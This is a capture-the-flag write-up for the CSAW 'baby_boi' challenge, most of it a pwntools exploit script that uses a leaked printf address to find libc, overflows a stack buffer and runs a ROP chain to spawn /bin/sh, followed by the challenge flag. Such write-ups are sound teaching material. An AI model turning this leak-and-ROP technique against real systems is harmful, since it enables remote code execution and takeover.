Welcome to pwn.
nc pwn.chal.csaw.io 1005
The binary already leaks the address of printf
, so we can easily calculate the libc
base address. Then we overflow the buffer (no stack canaries enabled) and perform a ROP
chain to execute the system
function with the argument /bin/sh
.
Exploit script:
from pwn import *
libc = ELF('libc-2.27.so')
rop = ROP('baby_boi')
POP_RDI_RET = (rop.find_gadget(['pop rdi', 'ret']))[0]
RET = (rop.find_gadget(['ret']))[0]
p = process('baby_boi')
# p = remote('pwn.chal.csaw.io', 1005)
data = p.recv()
printf = int(data.splitlines()[1].split(' ')[3],16) - libc.symbols['printf']
log.info('libc base: ' + hex(printf))
system = printf + libc.symbols['system']
log.info('system at: ' + hex(system))
shell = printf + next(libc.search("/bin/sh"))
log.info('/bin/sh at: ' + hex(shell))
p.sendline('A' * 40 + p64(RET) + p64(POP_RDI_RET) + p64(shell) + p64(system))
p.interactive()
flag: flag{baby_boi_dodooo_doo_doo_dooo}